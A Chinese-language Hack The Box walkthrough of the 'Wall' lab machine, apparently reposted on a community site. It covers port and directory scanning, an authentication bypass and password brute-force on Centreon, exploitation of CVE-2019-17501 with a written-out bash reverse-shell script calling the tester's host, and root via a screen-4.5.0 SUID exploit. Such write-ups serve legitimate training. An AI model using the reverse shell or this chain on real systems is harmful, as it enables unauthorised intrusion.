Hack the box_Wall靶机

举报
Khan安全团队 发表于 2023/05/15 09:45:02 2023/05/15
【摘要】 Hack the box_Wall靶机
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。

信息枚举


masscan扫描开放端口

 

图片


nmap探测22,80端口的服务信息,发现被过滤了


 

图片


 

利用gobuster扫描web

->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157

->/.hta (Status: 403)

->/.htpasswd (Status: 403)

->/.htaccess (Status: 403)

->/index.html (Status: 200)

->/monitoring (Status: 401)

->/server-status (Status: 403)

 

只有monitoring有点用,不过monitoring需要认证才能登录发现只要把访问方式改为POST就能绕过认证进去发现这是一个centreon系统(Centreon是一个网络,系统,应用程序监督和监视工具)登陆处有一个csrf令牌验证,每次访问都会更改

 

图片


在官网中得知,我们访问/api/index.php?action=authenticate,并且提供登录登录信息,将可以绕过令牌校验,从而达到爆破目的

 

图片


我们使用Seclist字典进行爆破密码为 password1

 

图片


我们发现了系统版本为19.04.0

 

图片



低权限shell


该系统存在CVE-2019-13024漏洞,不过当我使用poc尝试攻击时,发现poc用不了,payload有一个过滤处响应403 后来我发现了CVE-2019-17501,这个要简单一点在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中写入bash并用SimpleHTTPServer上传自己的webshellwebshell如下


->#!/bin/bash 

->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1

 

图片


再次写入bash命令获得反向连接shell

->bash /tmp/n00b.sh

并且获得TTY终端

 

图片


 

权限提升


在使用自动化脚本枚举系统信息中发现系统中有一个不常见的suid二进制文件:

/bin/screen-4.5.0

 

图片


使用poc获得root权限

 

图片


最后我们得到了user.txt、root.txt

【版权声明】本文为华为云社区用户原创内容,未经允许不得转载,如需转载请自行联系原作者进行授权。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。